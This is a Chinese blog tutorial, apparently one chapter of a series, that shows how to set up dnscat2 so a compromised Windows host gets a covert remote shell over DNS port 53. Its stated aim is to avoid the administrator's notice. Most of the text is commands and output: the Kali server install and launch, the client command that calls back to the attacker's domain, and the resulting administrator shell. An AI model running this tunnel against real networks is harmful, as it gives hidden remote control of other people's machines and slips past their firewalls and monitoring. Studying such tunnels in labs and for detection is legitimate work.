前言
上一章,我们学习了iodine穿透防火墙的udp协议53端口的配置,解决了在dns2tcp无法在windows平台下使用的问题,但实际操作中,经常只能获取到一个shell,只能受限在命令行中运行,而iodine需要我们在客户端安装时在图形界面下安装虚拟网卡,这操作一来比较繁琐,二来动静很大,很容易引起管理员注意。因此,有必要再来简单了解一下dnscat2的配置。
一、拓扑结构
环境配置原理在前面有详细说过,这里不再说明。
二、服务端配置
1.安装依赖库与dnscat2
root@kali:~# apt-get update
root@kali:~# apt-get -y install ruby-dev git make g++
root@kali:~# gem install bundler
root@kali:~# git clone https://github.com/iagox86/dnscat2.git
root@kali:~# cd dnscat2/server
root@kali:~/dnscat2/server# bundle install
Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your
bundle as root will break this application for all non-root users on this machine.
Fetching gem metadata from https://rubygems.org/.......
Using bundler 2.1.4
Fetching ecdsa 1.2.0
Installing ecdsa 1.2.0
Fetching salsa20 0.1.1
Installing salsa20 0.1.1 with native extensions
Fetching sha3 1.0.1
Installing sha3 1.0.1 with native extensions
Fetching trollop 2.1.2
Installing trollop 2.1.2
Bundle complete! 4 Gemfile dependencies, 5 gems now installed.
Use `bundle info [gemname]` to see where a bundled gem is installed.
看到上面的提示就说明安装正确了,笔者在安装中遇到一个坑,之前使用是kali2020.1,会报错。由于对ruby不熟,更新kali2020.4成功安装。
2.启动服务端
在192.168.0.164(kali.redwand.com)上运行命令
┌──(root💀kali20204)-[~/dnscat2/server]
└─# ruby dnscat2.rb test.redwand.com --secret=passwd --no-cache
New window created: 0
New window created: crypto-debug
dnscat2> Welcome to dnscat2! Some documentation may be out of date.
auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = test.redwand.com]...
Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):
./dnscat --secret=passwd test.redwand.com
To talk directly to the server without a domain name, run:
./dnscat --dns server=x.x.x.x,port=53 --secret=passwd
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.
三、客户端配置
客户端下载地址
https://downloads.skullsecurity.org/dnscat2
我们可以下载编译好的二进制文件,直接解压使用。本实验中运行命令
C:\Documents and Settings\Administrator\桌面\dnscat2-v0.07-client-win32>dnscat2-
v0.07-client-win32.exe --dns server=kali.redwand.com --secret=passwd
Creating DNS driver:
domain = (null)
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = kali.redwand.com
** Peer verified with pre-shared secret!
Session established!
这里需要注意的是–dns server=kali.redwand.com不可以填写成test.redwand.com,这里的参数是解析dns权威服务器,而不是上级委派服务器。
服务端连接成功后,可以使用shell命令新建一个window,然后切换窗后得到一个shell。
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!
That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.
command (qd-4f18765d03a8) 1> shell
Sent request to execute a shell
command (qd-4f18765d03a8) 1> New window created: 2
Shell session created!
command (qd-4f18765d03a8) 1> window -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
Microsoft Windows [°汾 5.2.3790]
(C) °爨̹Ԑ 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\Ħ\dnscat2-v0.07-client-win32>whoami
cmd.exe (qd-4f18765d03a8) 2> whoami
qd-4f18765d03a8\administrator
总结
今天简单了解了dnscat2的运用,其原理与之前dns隧道相同,只是有些具体配置会有小坑,对于其他详细操作可以实战中继续学习。
扫一扫
1138
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
